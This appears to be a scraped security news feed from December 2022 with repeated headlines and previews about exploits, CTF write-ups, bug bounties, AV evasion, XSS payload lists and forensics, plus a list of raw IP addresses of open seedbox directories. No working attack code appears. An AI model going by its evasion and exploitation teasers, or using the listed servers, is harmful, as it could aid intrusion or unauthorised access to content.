    Article URL: https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.htmlExploitingCVE-2022-42703-Bringingbackthestackattackhttps://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.htmlExploitingCVE-2022-42703-Bringingbackthestackattackhttps://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html Comments URL: https://news.ycombinator.com/item?id=33941146 Points: 1 # Comments: 0
  • Open

    imaging failed with FTK
    I created a VHD of 1GB and was tasked with imaging it with an FTK imager. But It gives me "ran out of disk space during memory capture" What do I have to do to fix this? It's my first time using ftk. submitted by /u/Hot-Sun-6127 [link] [comments]
  • Open

    Pidfd and Socket-lookup BPF (SK_LOOKUP) Illustrated (2022)
    TL; DR Most unix programming text books as well as practices hold the following statements to be true: One socket could be opened by one and only one process (application); One socket could listen/serve on one and only one port; Recall the bind system call int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen) where addr is determined by IP+Port (and socket address family). However, with some advanced techniques like pidfd_getfd() system call in Linux kernel 5.4+ and SK_LOOKUP BPF in kernel 5.6+, we could easily break the above limitations, supporting scenarios like below: +-----------+ +-----------+ +----------+ +------------------+ | Process 1 | | Process 2 | | Process 3| | Process(app) | …
    [译] Socket listen 多地址需求与 SK_LOOKUP BPF 的诞生(LPC, 2019)
    译者序 本文组合翻译 Cloudflare 的几篇分享,介绍了他们面临的独特网络需求、解决方案的演进, 以及终极解决方案 SK_LOOKUP BPF 的诞生: Programming socket lookup with BPF, LPC, 2019 It’s crowded in here, Cloudflare blog, 2019 Steering connections to sockets with BPF socket lookup hook,eBPF Summit,2020 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 引言 1.1 现状:Cloudflare 边缘架构 1.2 需求:如何让一个服务监听至少几百个 IP 地址 2 场景需求与解决方案演进 2.1 简单场景:一个 socket 监听一个 IP 地址 2.2 进阶场景:一个 socket 监听多个 IP 地址 2.2.1 bind(INADDR_ANY) 或 bind(0.0.0.0) 2.2.2 listen() unbound socket 2.2.3 技术原理:内核 socket lookup 逻辑 2.2.4 优缺点比较 2.3 魔鬼场景:同一台机器上不同 service 使用同一个 port(IP 不重叠) 2.4 地狱场景:一个 service 监听所有 65535 个端口 2.4.1 iptables + TPROXY 2.4.2 TPROXY 方案缺点 2.4.3 有没有银弹? 3 SK_LOOKUP BPF:对 socket lookup 过程进行编程 3.1 设计思想 3.2 引入新的 BPF 程序类型 SK_LOOKUP 3.2.1 程序执行位置 3.2.2…

  • Open

    MS Sentinel Analytics & KQL
    I'm struggling to learn how to create custom analytics rules (KQL queries) in Sentinel both over Microsoft native connectors (Azure AD, Office 365) and a syslog connector (all kinds of logs, mainly Windows Server logs). If you've got any experience with this problem, I'd appreciate if you could share some resources that helped you learn KQL when you started dealing with this (I have an idea about what I want to monitor, I just have some issues putting the KQL queries together). Thanks! submitted by /u/FreakySeahorse [link] [comments]
  • Open

    CRTP — Overview e Dicas!
    CRTP ou Certified Red Team Professional é uma prova da Pentester Academy em que consiste em abusar de recursos e funcionalidades em um… Continue reading on Medium »
  • Open

    A vulnerability classified as critical has been found in gsi-openssh-server 7.9p1 on Fedora (Connectivity Software) on server (http://95.217.64.181:22
    Nextcloud disclosed a bug submitted by ibrahim71192: https://hackerone.com/reports/1726445
    SSRF vulnerability can be exploited when a hijacked aggregated api server such as metrics-server returns 30X
    Kubernetes disclosed a bug submitted by weinongw: https://hackerone.com/reports/1544133 - Bounty: $1000
  • Open

    Advent of Cyber 2022 [Day9]-Pivoting | Dock the halls — Short Writeup and Walkthrough
    No content preview
    Year of the Rabbit — TryHackMe Writeup By Karthikeyan
    No content preview
    TryHackMe CMesS CTF
    No content preview
    Operationalizing MITRE ATT&CK to harden cyber defenses
    Take Adversary’s perspective in Defender’s Team Continue reading on InfoSec Write-ups »
    TryHackMe writeup: Basic Pentesting
    In this room, I discuss the process that I used to complete TryHackMe’s “Basic Pentesting” room. Continue reading on InfoSec Write-ups »
    Recon
    No content preview
    Write-up: DOM XSS in document.write sink using source location.search @ PortSwigger Academy
    No content preview
    Smart contracts
    No content preview
  • Open

    Advent of Cyber 2022 [Day9]-Pivoting | Dock the halls — Short Writeup and Walkthrough
    No content preview
    Year of the Rabbit — TryHackMe Writeup By Karthikeyan
    No content preview
    TryHackMe CMesS CTF
    No content preview
    Operationalizing MITRE ATT&CK to harden cyber defenses
    Take Adversary’s perspective in Defender’s Team Continue reading on InfoSec Write-ups »
    TryHackMe writeup: Basic Pentesting
    In this room, I discuss the process that I used to complete TryHackMe’s “Basic Pentesting” room. Continue reading on InfoSec Write-ups »
    Recon
    No content preview
    Write-up: DOM XSS in document.write sink using source location.search @ PortSwigger Academy
    No content preview
    Smart contracts
    No content preview
  • Open

    Advent of Cyber 2022 [Day9]-Pivoting | Dock the halls — Short Writeup and Walkthrough
    No content preview
    Year of the Rabbit — TryHackMe Writeup By Karthikeyan
    No content preview
    TryHackMe CMesS CTF
    No content preview
    Operationalizing MITRE ATT&CK to harden cyber defenses
    Take Adversary’s perspective in Defender’s Team Continue reading on InfoSec Write-ups »
    TryHackMe writeup: Basic Pentesting
    In this room, I discuss the process that I used to complete TryHackMe’s “Basic Pentesting” room. Continue reading on InfoSec Write-ups »
    Recon
    No content preview
    Write-up: DOM XSS in document.write sink using source location.search @ PortSwigger Academy
    No content preview
    Smart contracts
    No content preview
  • Open

    Block 1M+ users from accessing their accounts by taking over third-party service
    Night Hunter is not a one-person night hunter is everyone who chooses to hack for a reason, night hunters always thirsty for more and more… Continue reading on Medium »
    Subdomain Enumeration…? DNS-Discovery
    Hello to all Thank you for your support😊, today will see How to Install, Test and Run DNS-Discovery on Kali Linux. Continue reading on Medium »
    Automate Cross-Site Scripting (XSS) exploitation with unusal events and Burp Intruder
    As a bug bounty hunter, it’s always a thrilling experience to come across a vulnerability that allows you to bypass a web application… Continue reading on Medium »
    Scoring $$$ for a very simple bug : You don’t always need proxy tools
    Hello Everyone, Continue reading on Medium »
  • Open

    Melihat informasi dari suatu foto dengan exiftool
    Halo semuanya, kali ini saya akan sharing tentang bagaimana mencari informasi dari suatu gamber dengan extensi seperti .png .jpg .jpeg dan… Continue reading on Medium »
    Хакерские боты Телеграм
    Все боты актуальны, мы их проверяли на скам перед публикации. Конечно, они не гарантируют 100% результат, но если информация есть в сливах… Continue reading on Medium »
    Analysis of the whitewashing of human rights violations in Xinjiang, China
    Chris Osieck Editing in English by Sarah Stoecklin Web spider and Python by Mischa Untaga Research Support by Rosa Noctis Continue reading on Medium »
  • Open

    What is your day to day life as a DFIR specialist?
    Actually I am wondering, what your day to day life is and especially: what do you do when there are no incidents. I am curious because I really like DFIR and I am already a SOC analyst, but I am scared that it will be boring most of the time. submitted by /u/LogDumpster [link] [comments]
  • Open

    SecWiki News 2022-12-10 Review
    Thinkphp 多语言 RCE by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-10 Review
    Thinkphp 多语言 RCE by ourren 更多最新文章,请访问SecWiki
  • Open

    Pwn2Own Toronto 2022 Results
    submitted by /u/seyyid_ [link] [comments]
  • Open

    Nebuchadnezzar - Practically-exploitable Cryptographic Vulnerabilities in Matrix
    submitted by /u/Gallus [link] [comments]
    Mobile Bug Bounty Hunting? Enter BLE – Cybervelia
    submitted by /u/Necessary-Reality-80 [link] [comments]
    Polar: debugging on LLDB using OpenAI's davinci-003 language model - @ant4g0nist
    submitted by /u/ant4g0nist [link] [comments]

  • Open

    Various directories from seedboxes (should be fast) NSFW/Movies/Music/TV/software
    http://185.148.3.219:37863/ http://185.148.3.100:9514/ http://185.148.3.141:36657/ http://185.148.3.141:30114/tres/ http://185.148.1.97:30332/ http://185.148.1.166:36285/ http://185.148.1.115:36796/ http://185.148.1.102:36724/ http://185.148.0.38:34592/ http://185.148.0.145:37886/ BIG ONE http://185.148.3.226:21668/ http://185.148.3.184:28903/ http://185.148.3.182:21548/ http://185.148.3.141:22993/ http://185.148.1.158:27881/ http://185.148.1.149:26629/ http://185.148.1.123:25147/cavs/ http://185.148.1.97:18558/ submitted by /u/mingaminga [link] [comments]
    A bunch of PDF's about military songs
    Not a true OD, but almost. Looks like a bunch of PDF's . Copied from the website: " This is where we place my Military Songbook Collection which includes naval, army and marine songbooks. This list was last updated 30 Mar 2020." Military Songbook Collection submitted by /u/BustaKode [link] [comments]
    A bunch of naughty songs
    Another true OD. Seems like a huge collection of "naughty songs" in some of the subs, plus normal songs if interested. Did not check them all out. Naughty and normal songs submitted by /u/BustaKode [link] [comments]
    Just in time for Christmas
    Some Christmas songs. There are some unique ones in the mix. A true OD. Christmas Songs submitted by /u/BustaKode [link] [comments]
  • Open

    How to work with Bloodhound output?
    Hi there, I tried to use Bloodhound in context of AD audit (I had plan to use it with Ping Castle and Purple Knight). But, I see this Bloodhound output and honestly speaking, I can't create step-by-step process how to procceed the data I see, how to identify any red flag, how to identify not best practice of user managment, how to identify user/workstation risks? I see that my expertise in this is small, I thought to deal with it myself, but so far I have received nothing. Can someone share your though? How you work with this? What you pay attention to? Red teams/pentesters, please join converstation. submitted by /u/athanielx [link] [comments]
    Tiers Implementation NIST
    I am doing a cybersecurity course and I am in the middle of an assessment where I really struggle to complete one of the questions which is: Develop a report for the security control implementation guideline. Consider appropriate cyber security strategy for the guideline. You need to assume possible tools that are relevant for controlling the identified risks and produce a toolkit. The case study is the Marriott Hotel submitted by /u/Daikon_United [link] [comments]
    Why do so many firms use SMS for 2FA when cellphone numbers are regularly reassigned?
    Cellphone numbers are regularly reassigned, resulting in third parties receiving auth codes SMS isn't even encrypted SMS isn't accessible from abroad in many cases Why is SMS used as 2FA? Specifically, why do even financial firms resort to this practice? It's unrealistic and either lazy or naive to expect users to regularly update their phone numbers for every service after they switch submitted by /u/Jerooast [link] [comments]
  • Open

    OIDC — Github Actions Abuse
    Hi readers, here we will see how someone knowing/guessing role arn created for GitHub actions can escalate privileges. Continue reading on Medium »
  • Open

    Investigating ‘Fraud Factories’ of Myanmar
    Scam centres that lured hundreds of Indians into Cyber Slavery. Continue reading on Medium »
    10 Practical Recon & vulnerability Scanners for bug hunters (part one)
    Continue reading on Medium »
    TryHackMe: Advent of Cyber 2022 (Day 3) Nothing escapes detective McRed
    “As the elves are trying to recover the compromised santagift.shop website, elf Recon McRed is trying to figure out how it was compromised… Continue reading on Medium »
  • Open

    How would you run a process under the localservice/network user in C?
    submitted by /u/yomyoo [link] [comments]
    RtlCreateUserProcess C Source
    I discovered something known as the Windows Research Kernel (WRK) https://github.com/mic101/windows and contains the C/assembly source code for Windows Server 2003 SP1 kernel. You can view the C source implementation for functions such as RtlCreateUserProcess https://github.com/mic101/windows/blob/master/WRK-v1.2/base/ntos/rtl/rtlexec.c as well as NtCreateProcess and the entire flow of process creation. Sharing this because it is the solution to creating a process using system calls and redirecting standard out/error to a pipe or other handle. submitted by /u/edreatingmonkey [link] [comments]
  • Open

    Ongoing Typosquatting Campaign Publishing Malware to PyPI
    submitted by /u/louis11 [link] [comments]
    Cool vulns don't live long - Netgear and Pwn2Own
    submitted by /u/Gallus [link] [comments]
    Using ChatGPT to Generate Phishing Campaigns
    submitted by /u/rickyrockslide [link] [comments]
    Hooking System Calls in Windows 11 22H2 like Avast Antivirus. Research, analysis and bypass
    submitted by /u/Gallus [link] [comments]
  • Open

    Supply Chain Attacks on the risk - Open Source Security
    No content preview
    TryHackMe writeup: RootMe
    A simple TryHackMe room that is good stuff for ctf practice. I root a boot2root system with a Katana sword (and Python ;-) Continue reading on InfoSec Write-ups »
    HackTheBox — Networked Writeup
    No content preview
    Email analysis : avoid phishing attacks
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 7] Maldocs roasting on an open fire— No Answers :P
    Day 7 Learning Objectives: Continue reading on InfoSec Write-ups »
    The most underrated injection of all time — CYPHER INJECTION.
    No content preview
    STRIPE Live Key Exposed:: Bounty: $1000
    No content preview
    Don’t Miss the Expert Talks at IWCON2022 Cybersecurity Conference
    No content preview
  • Open

    Supply Chain Attacks on the risk - Open Source Security
    No content preview
    TryHackMe writeup: RootMe
    A simple TryHackMe room that is good stuff for ctf practice. I root a boot2root system with a Katana sword (and Python ;-) Continue reading on InfoSec Write-ups »
    HackTheBox — Networked Writeup
    No content preview
    Email analysis : avoid phishing attacks
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 7] Maldocs roasting on an open fire— No Answers :P
    Day 7 Learning Objectives: Continue reading on InfoSec Write-ups »
    The most underrated injection of all time — CYPHER INJECTION.
    No content preview
    STRIPE Live Key Exposed:: Bounty: $1000
    No content preview
    Don’t Miss the Expert Talks at IWCON2022 Cybersecurity Conference
    No content preview
  • Open

    Supply Chain Attacks on the risk - Open Source Security
    No content preview
    TryHackMe writeup: RootMe
    A simple TryHackMe room that is good stuff for ctf practice. I root a boot2root system with a Katana sword (and Python ;-) Continue reading on InfoSec Write-ups »
    HackTheBox — Networked Writeup
    No content preview
    Email analysis : avoid phishing attacks
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 7] Maldocs roasting on an open fire— No Answers :P
    Day 7 Learning Objectives: Continue reading on InfoSec Write-ups »
    The most underrated injection of all time — CYPHER INJECTION.
    No content preview
    STRIPE Live Key Exposed:: Bounty: $1000
    No content preview
    Don’t Miss the Expert Talks at IWCON2022 Cybersecurity Conference
    No content preview
  • Open

    【漏洞通报】Thinkphp 多语言模块命令执行漏洞
    如果 Thinkphp 程序开启了多语言功能,攻击者可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现...
  • Open

    【漏洞通报】Thinkphp 多语言模块命令执行漏洞
    如果 Thinkphp 程序开启了多语言功能,攻击者可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现...
  • Open

    Bug Zero at a Glance [Week 3–9 December]
    What happened with Bug Zero? Continue reading on Bug Zero »
    10 Practical Recon & vulnerability Scanners for bug hunters (part one)
    Continue reading on Medium »
    Cross Origin Resource Sharing: Hacking Bank Accounts
    TL;DR- Commonly known as CORS, Cross Origin Resource Sharing is a crucial functionality for all websites. Continue reading on The Gray Area »
    Partnering with Immunefi to Ensure Exactly’s Safety: Introducing our Bug Bounty Program
    At Exactly Protocol, we prioritize security above all else. That is why we have had our smart contracts audited by top audit firms at… Continue reading on Medium »
    All about: Single-Sign On (SSO)
    Single sign-on (SSO) is a feature that allows users to access multiple services belonging to the same organization without logging in… Continue reading on Medium »
    STRIPE Live Key Exposed:: Bounty: $1000
    Hey Hunters, Continue reading on InfoSec Write-ups »
    PRIVATE VS PUBLIC BUG BOUNTY PROGRAM
    WHAT IS A BUG BOUNTY PROGRAM? Continue reading on Medium »
    Vertical Privilege Escalation: The user can takeover an admin account via response manipulation
    Privilege escalation attacks occur when a threat actor gains access to an employee’s account, bypasses the proper authorization channel… Continue reading on Medium »
    Privilege Escalation to remove the owner from the organization
    Hi Hackers, Today i am going to tell you about my one of interesting finding. Which is privilege escalation to remove the owner from the… Continue reading on Medium »
    XSS Hunter Slack Alerts
    This is a tutorial of how to setup XSS Hunter with Slack Alerts Continue reading on Medium »
  • Open

    SecWiki News 2022-12-09 Review
    ACSAC 2022 论文录用列表 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-09 Review
    ACSAC 2022 论文录用列表 by ourren 更多最新文章,请访问SecWiki
  • Open

    要钱还是要命?医院遭勒索攻击暂停手术,转移重症患者
    勒索攻击者开出了解密系统的赎金,医院可以选择不支付赎金。但对于急需手术的病人来说,无异于是一场“谋杀”。
    苹果升级数据保护功能,iCloud服务启用端到端加密备份
    新增高级数据保护功能,可在iCloud服务中启用端到端加密(E2EE)数据备份。该功能属于可选功能,预计今年年底前在美国推出。
    FreeBuf早报 | 美国就儿童数据安全起诉TikTok;美国卫生部警告勒索软件瞄准医疗机构
    思科披露了一个影响其最新一代 IP 电话的高严重性漏洞,使其面临远程代码执行和拒绝服务(DoS)攻击。
    FreeBuf周报 | 乌克兰IT军关闭了俄罗斯第二大银行;三菱电机PLC曝出多个严重安全漏洞
    本文总结了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过每一个重点!
    “匿影”组织再次活跃——通过爆破数据库发起勒索攻击
    “匿影”组织于2019年3月份首次被披露,从被披露的3年来,该组织一直保持较高的活跃度,变种也在持续升级。
    Hive勒索组织黑五期间攻击欧洲零售商,已累计攻击1300家公司
    黑色星期五的攻击影响了法国北部的Intersport门店,全部员工数据泄露。
  • Open

    Is it practically possible that two drives (identical make) have the same MD5 hash?
    Is it practically possible that two drives (identical make) have the same MD5 hash? Image is physical and done via FTK imager. Shouldn’t they differ even when they are used in raid? submitted by /u/One-Neighborhood1742 [link] [comments]
  • Open

    Apa Itu Cross-site scripting (XSS)?
    Cross-site scripting (XSS) adalah salah satu teknik keamanan yang digunakan hacker untuk menyusupkan kode internet dan memanfaatkan bug… Continue reading on Medium »
  • Open

    [nextcloud/server] Moment.js vulnerable to Inefficient Regular Expression Complexity
    Nextcloud disclosed a bug submitted by mik-patient: https://hackerone.com/reports/1712329

  • Open

    Bitlocker and unencrypted key traces
    Let's say a Windows drive is encrypted from within the OS, with "Encrypt used disk space only". Is it possible that some unencrypted data about any of the protectors (like password or recovery password) is left behind? On an SSD the data usually isn't overwritten if there's free space. I guess Bitlocker isn't stupid enough to write unencrypted keys to a not-yet-encrypted drive directly. But maybe the keys are in RAM and then they end up in the pagefile? Is the pre-encryption process explained in detail somewhere? submitted by /u/newser21 [link] [comments]
    Cellebrite Blank Messages
    I have seen on almost all my recent iPhone collections that Cellebrite shows some blank messages for messages that are visibly still on the device. It’s alarming that the message is not deleted on the device and appears to not be pulled. These are not in the Instant Messages tab. I’m seeing these in the typical Native Messages tab, within conversations that have other messages that were pulled just fine. I’ve been able to replicate the issue when collecting my personal device using Cellebrite 4PC as well as doing an iTunes Backup. Some messages that are on my personal phone show up as blank in Cellebrite Physical Analyzer. I’ve opened a ticket with Cellebrite, but was wondering if anyone else has been experiencing this lately. TLDR: Some iMessages that are on a device, not deleted, are appearing as blank in Cellebrite. submitted by /u/TheInvisiblePoo [link] [comments]
    Anyone using Axiom REVIEW?
    I don't know why they capitalize every product name... Anyway, I'm hearing about REVIEW and wondering if anyone has used it. What are your thoughts? Does it pull info from multiple cases? submitted by /u/ShakeyShooter [link] [comments]
    confused
    Hi I was hoping somone on here could explain what computed has is and what reported hash is. Thanks submitted by /u/Acceptable_Use4747 [link] [comments]
  • Open

    Compromised Cloud Compute Credentials: Case Studies From the Wild
    A walk-through of attacks in the wild that abuse stolen cloud compute credentials in the cloud environment. Unit 42 researchers highlight two case studies. The post Compromised Cloud Compute Credentials: Case Studies From the Wild appeared first on Unit 42.
  • Open

    Nosey Parker: a new scanner to find misplaced secrets in textual data and Git history
    submitted by /u/exploding_nun [link] [comments]
    Hacking the Furbo Dog Camera: Part III
    submitted by /u/somersetrecon [link] [comments]
    Fuzzing Golang msgpack for fun and panic
    submitted by /u/Schwag [link] [comments]
    How to secure your Open Source Project – A quick guide for developers
    submitted by /u/TupleType1 [link] [comments]
    Using JSON in a New Generic Web Application Firewall Bypass
    submitted by /u/derp6996 [link] [comments]
    cli google search client written by chatgpt ai - bypasses captcha and rate limiting
    submitted by /u/endless [link] [comments]
    Shoggoth
    Shoggoth: Asmjit Based Polymorphic Encryptor submitted by /u/DarkGrejuva [link] [comments]
    GitHub - klezVirus/SilentMoonwalk: PoC Implementation of a TRUE call stack spoofer
    submitted by /u/R3dCr0wn [link] [comments]
  • Open

    Bug Bounty Hunting 101 — Remote Code Execution (RCE)
    TL;DR- The best ways to utilize different vulnerabilities and chain them together for high level bug bounties! Continue reading on The Gray Area »
    Masa Bug Bounty Program Вікдрита!
    Masa офіційно запускає нашу поточну програму винагород за помилки, яка тепер відкрита для участі спільноти. Ми також пропонуємо спеціальне… Continue reading on Medium »
    Upgrading Your XSS Bugs from Medium to Critical: Techniques and Examples
    Cross-site scripting (XSS) is a common vulnerability in web applications that allows attackers to inject malicious code into web pages and… Continue reading on Medium »
    CORS Misconfig on Out of scope domain Bug Bounty Writeup (300 USD Reward )
    I got an invite to a bug bounty program, the scope of the testing was on app.redacted.com While checking and understanding the login… Continue reading on Medium »
    A software bug captured Apple and other huge companies
    We collected some hot stories about programming errors for you to have a little fun and learn something new :) Continue reading on PVS-Studio »
    Hacking Government-Millions of Death-Certificate(EASY)
    Here’s how I gained the access to Millions of Death Certificates by discovering 3 vulnerabilities. I hacked a state government website… Continue reading on Medium »
    Taking Over Databases using SQL Map — SQL Injection Attacks
    SQLMap can help identify SQL injection vulnerabilities in web applications. Learn how to exploit and take over databases in this practical… Continue reading on Stealth Security »
    Account takeover without user interaction via the mail server
    Night Hunter is not a one-person night hunter is everyone who chose to hack for a reason, night hunters always thirsty for more and more… Continue reading on Medium »
  • Open

    PAI Research Process, part 1
    There is no one best research process or method for everyone. Each PAI researcher will develop workflows that suit their needs best, and… Continue reading on Medium »
    OSINT Ve Sosyal Mecralardaki Kritik Paylaşımlar
    Artık hepimizin en azından birer telefonu var ve “sosyal paylaşım” çağında yaşadığımızı, kritik fotoğraf ve videolarla dolu hesaplarımızın… Continue reading on Medium »
  • Open

    Exploiting CVE-2022-42703 – Bringing back the stack attack
    Article URL: https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html Comments URL: https://news.ycombinator.com/item?id=33913961 Points: 1 # Comments: 0
  • Open

    🎁 Giveaway 🎁
    submitted by /u/Strict_Pomegranate78 [link] [comments]
  • Open

    Insecure use of shell.openExternal() leads to RCE in Rocket.Chat-Desktop
    Rocket.Chat disclosed a bug submitted by sectex: https://hackerone.com/reports/1781102
  • Open

    Microsegmentation and Routing
    Network topology question... If you're doing micro-segmentation using a hypervisor firewall (NSX-T or Nutanix Flow, for example), is there any advantage to having your application tiers on different subnets? Seems to me, if you're making security decisions without having to traverse a router, that's better -- the routing step just adds complexity for no security benefit. But, the NSX-T manual is really into its own Logical Routing chapter: https://nsx.techzone.vmware.com/resource/nsx-t-reference-design-guide-3-0#_NSX-T_Logical_Routing_1 So, what's the benefit to routing that I'm not getting? Or, is this just to placate managers that can't separate the concept of a firewall from the concept of a router? submitted by /u/eldergrapple [link] [comments]
    Monitor USB camera network activity
    Hello, Is this feasible? Let’s say we plug in a webcam, no installation of software, only uses windows built in drivers, could the webcam possibly communicate to a remote host? Technically there is no « known » process to monitor. Would need to capture the regular traffic without the camera, then with the camera, then another one while being in a meeting. Is this all overkill? Can we assume USB camera would not be doing communication to the company website let’s say? Thanks for your input! :) submitted by /u/unm3 [link] [comments]
    Newbie help?
    Hi all, I am a wanna be red teamer. I have some training in the workings of tcp/ip as well as general cybersecurity training. I am somewhat familiar with owasp and have contributed to some network scanning surveys. As a wanna be red teamer, I was wondering what type of exploit framework should I use. I would prefer something easy to use, I will however prefer a steep learning curve with a powerful tool. I would write my own tools, I just dont know enough. What exploit tools or premade tools could I take advantage of after the recon stage? I have used a little of sqlmap. as well as beEF. These however really cover only xss and sql injection. right now I am trying to get this bug bounty and I found a weakness that could be exploited. I just need some other tools to be able to exploit that weakness. Any thoughts, critisisms or ideas would be greatly appreicated. I would def appreicate any old hacker wisdom for my journey. submitted by /u/Johhny_Texas [link] [comments]
    How to conduct security assesment of AWS?
    Hi there, We need to make a security assesment of AWS (buckets, users, servers, etc). We need to evaluate current security controls, identify risks and try to fix it. Do you know any free 3-party tools that can be used to conduct the assessment? Let me share my old notes about it (I never use these tools): https://github.com/toniblyx/prowle (it's look like huge checklist) https://github.com/nccgroup/ScoutSuite (I used it for GCP one time, but I can't say if it good for AWS) https://github.com/abhaybhargav/bucketeer https://github.com/scalefactory/s3audit (it's look intersting, because I need to identify if we have open buckets) What you can suggest for build-in tools that can show security posture of AWS? submitted by /u/athanielx [link] [comments]
    Found external open ports on my router, now what?
    Ran an nmap portscan to my router from an external machine out of curiosity. To my surprise, it reported a 5 open ports in between 50xxx - 58xxx range to which I am able to open a telnet connection. The only thing that I have set in port forwarding is a UDP port to my pi running wireguard vpn. But even when I close it, the detected ports are still open and connectable. What can I do now to try and figure out what that may be ? Should I be worried of a compromised router (which is supplied by my local ISP - Bell Canada). Edit: upnp is closed on the router submitted by /u/MrMag00 [link] [comments]
  • Open

    Introducing passkeys in Chrome
    We announced in October that passkey support was available in Chrome Canary. Today, we are pleased to announce that passkey support is now available in Chrome Stable M108.    What are passkeys? Passwords are typically the first line of defense in our digital lives. However, they are at risk of being phished, leaked in data breaches, and even suffering poor password hygiene. Google has long recognized these issues, which is why we have created defenses like 2-Step Verification and Google Password Manager. To address these security threats in a simpler and more convenient way, we need to move towards passwordless authentication. This is where passkeys come in. Passkeys are a significantly safer replacement for passwords and other phishable authentication factors. They cannot be reused, don'…
  • Open

    SecWiki News 2022-12-08 Review
    安全测试案例库 by ourren 2022年度“CCF优秀博士学位论文激励计划”论文列表 by ourren BlackHat2022:4G/5G新型前门攻击解读 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-08 Review
    安全测试案例库 by ourren 2022年度“CCF优秀博士学位论文激励计划”论文列表 by ourren BlackHat2022:4G/5G新型前门攻击解读 by ourren 更多最新文章,请访问SecWiki
  • Open

    Implementing Systemfunction033 shellcode encoding and decoding in cpp to bypass AV
    submitted by /u/intruderK [link] [comments]
    Shoggoth
    Shoggoth: AsmJit based Polymorphic Encryptor https://github.com/frkngksl/Shoggoth submitted by /u/DarkGrejuva [link] [comments]
  • Open

    FreeBuf早报 | 苹果为 iCloud 推出端到端加密;日本计划将网络防卫加入安保
    比利时最大城市数字服务遭网络攻击被迫中断,日本政府计划将网络防卫等内容加入安保相关文件
    大量中文网站被黑,嵌入世界杯相关关键词用于黑帽SEO
    研究人员发现与世界杯有关的黑帽 SEO,影响数量超过 5 万个站点。
    Vice Society 勒索软件太猖狂,一年内袭击 33 个教育机构
    网络安全能力有限、资源有限的教育机构往往最容易受到网络威胁,正在成为勒索软件组织的潜在目标。
    Pwn2Own 2022 开赛首日,三星旗舰手机Galaxy S22 二度被黑
    无独有偶,在去年举办的Pwn2Own上,三星当时最新的旗舰手机Galaxy S21也同样“被黑”。
  • Open

    New Burp Suite API: we want your feedback!
    If you follow the Burp Suite roadmap, then you'll know that we're working on a complete rewrite of the API used in Burp Suite Professional and Burp Suite Community Edition. The new API is codenamed "M
  • Open

    New Burp Suite API: we want your feedback!
    If you follow the Burp Suite roadmap, then you'll know that we're working on a complete rewrite of the API used in Burp Suite Professional and Burp Suite Community Edition. The new API is codenamed "M
  • Open

    Fuzzing ping(8) and finding a 24 year old bug
    Article URL: https://www.undeadly.org/cgi?action=article;sid=20221208082054 Comments URL: https://news.ycombinator.com/item?id=33906401 Points: 1 # Comments: 0
  • Open

    Hacking into Wi-Fi Camera TP-Link Tapo C200 (CVE-2021–4045)
    No content preview
  • Open

    Hacking into Wi-Fi Camera TP-Link Tapo C200 (CVE-2021–4045)
    No content preview
  • Open

    Hacking into Wi-Fi Camera TP-Link Tapo C200 (CVE-2021–4045)
    No content preview
  • Open

    Critical Vulnerability in Hasura GraphQL Engine v2.10.0
    Article URL: https://hasura.io/blog/critical-vulnerability-in-hasuras-graphql-engine-v2-10-0/ Comments URL: https://news.ycombinator.com/item?id=33904145 Points: 1 # Comments: 0

  • Open

    P1 Bug Hunting — Account Takeover w/ 2FA Bypass
    TL;DR- Locating and exploiting critical bugs can be tricky, as only a handful of dedicated bug hunters have ever found a P1 vulnerability. Continue reading on The Gray Area »
    What is Clickjacking?
    Hello everyone! Continue reading on Medium »
    A03:2021 — [Injection] SQL Injection through internal directory disclose
    Every tool is good if you know how to control noise from that! Continue reading on Medium »
    Masa Finance. Огляд протоколу. Airdrop і майбутній мінт доменного іменні .soul. Masa Bug.
    Disclaimer/ Данна стаття відображає думку автора і не є фінансовою рекомендацією, робіть своє власне дослідження перед тим як здійснювати… Continue reading on Medium »
    How I Found my First website Vulnerability
    Today, I want to share with you the story of how I found my first XSS vulnerability. It was a thrilling experience and I want to share it… Continue reading on Medium »
    Sensitive Information Disclosure in Mobile Application
    Most of the bug bounty program consist of Android/iOS application within their scope. These are some of the scope which are less tested… Continue reading on Medium »
    Bug Bounty Hunting Tips
    Bug bounty hunting is a popular way for cyber-security professionals and researchers to earn money by identifying and reporting security… Continue reading on Medium »
    TGA Weekly Newsletter [12/07/22]
    The Gray Area’s newsletter from 11/30/22 → 12/07/22, with a bunch of newly published must-reads. Continue reading on The Gray Area »
    SQL Injection Extracts Online Users status , completed registrations, net overall posts l Database
    Description: Continue reading on Medium »
  • Open

    You Won’t Believe the Top 5 Reasons Why X Blows Z Out of the Water!
    If you're trying to decide between X and Z, there are a few key reasons why you should consider choosing X over Z. Continue reading on Medium »
    Cross-Site Scripting (XSS) Vulnerability Payload List
    XSS Payload List Continue reading on Medium »
    30 Encoded XSS Payloads generated by ChatGPT
    8000+ XSS Payloads Continue reading on Medium »
  • Open

    index-of.es no longer open?
    Used to be a gigantic amazing library how come it's pass protected now? https://preview.redd.it/gz4khata4k4a1.png?width=1537&format=png&auto=webp&s=deac5f5b32f49afd69c6c405075ceb0be23e5b12 submitted by /u/pioliX000 [link] [comments]
    1001 Tutorials
    http://www.fricking.ninja/DIY/index/1001%20Tutorials/ submitted by /u/ManaHoney504 [link] [comments]
  • Open

    Firewalls under the hood - UFW
    submitted by /u/doitsukara [link] [comments]
    PyPI-distributed malicious package campagin tying into GitHub accounts and embedded into repos to disguise its intention - FULL ANALYSIS
    submitted by /u/dalmoz [link] [comments]
